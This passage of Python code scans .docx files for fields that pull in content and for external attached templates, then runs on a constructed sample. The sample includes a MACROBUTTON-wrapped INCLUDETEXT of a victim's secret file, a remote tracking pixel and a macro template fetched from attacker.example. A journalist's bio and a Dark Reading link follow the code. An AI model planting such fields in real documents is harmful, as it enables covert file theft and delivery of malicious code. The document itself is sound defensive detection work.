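        elif el.tag == W + "instrText" and stack:
            stack[-1].append(el.text or "")
    return fields


def scan_docx(docx_bytes: bytes) -> list[dict]:
    """Flag content-pulling fields in body/headers/footers (recording MACROBUTTON wrapping,
    header placement and remote targets) and an externally attached template."""
    findings: list[dict] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        names = set(z.namelist())
        for part in sorted(n for n in names if PART_RE.fullmatch(n)):
            for code, parent in extract_fields(z.read(part)):
                kw = keyword(code)
                if kw in CONTENT_FIELDS:
                    findings.append({"part": part, "field": kw, "code": code, "wrapped_by": parent,
                                     "remote": looks_remote(code), "in_header": part != "word/document.xml"})
        rels = "word/_rels/settings.xml.rels"
        if rels in names:
            for rel in ET.fromstring(z.read(rels)).iter(R + "Relationship"):
                if rel.get("TargetMode") == "External" and rel.get("Type", "").endswith("/attachedTemplate"):
                    findings.append({"part": rels, "field": "attachedTemplate", "code": rel.get("Target", ""),
                                     "wrapped_by": None, "remote": True, "in_header": False})
    return findings


# Constructed sample parts, not a real-world document: header = MACROBUTTON wrapping an
# INCLUDETEXT of a local file; body = benign PAGE field plus a remote INCLUDEPICTURE;
# settings relationships = external attached template.
_W = 'xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"'
SAMPLE_DOCUMENT = ('<w:document ' + _W + '><w:body><w:p><w:r><w:t>Invoice 4711</w:t></w:r>'
    '<w:fldSimple w:instr=" PAGE "><w:r><w:t>1</w:t></w:r></w:fldSimple></w:p>'
    '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r><w:r><w:instrText xml:space="preserve">'
    ' INCLUDEPICTURE "http://tracker.example/pixel.png" \\d </w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p></w:body></w:document>').encode()
SAMPLE_HEADER = ('<w:hdr ' + _W + '><w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText xml:space="preserve"> MACROBUTTON NoMacro [Double-click to open] </w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText xml:space="preserve"> INCLUDETEXT "C:\\\\Users\\\\victim\\\\secret.txt" </w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:fldChar w:fldCharType="end"/></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p></w:hdr>').encode()
SAMPLE_SETTINGS_RELS = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" TargetMode="External" Target="http://attacker.example/invoice.dotm" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"/>'
    '</Relationships>').encode()


def build_sample_docx() -> bytes:
    """Zip the constructed parts into a minimal .docx so the scanner runs offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", SAMPLE_DOCUMENT)
        z.writestr("word/header1.xml", SAMPLE_HEADER)
        z.writestr("word/_rels/settings.xml.rels", SAMPLE_SETTINGS_RELS)
    return buf.getvalue()
```

Calling `scan_docx(build_sample_docx())` yields three findings: the remote INCLUDEPICTURE in the body, the INCLUDETEXT in the header with `wrapped_by` set to MACROBUTTON, and the external template. The benign PAGE field is not reported. The scanner deliberately never resolves a target; it only records what the document would fetch, which is what a mail gateway or triage script needs to decide whether to quarantine.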

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial …

Article source: https://www.darkreading.com/endpoint/researchers-dig-into-microsoft-office-functionality-flaws/d/d-id/1333870?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple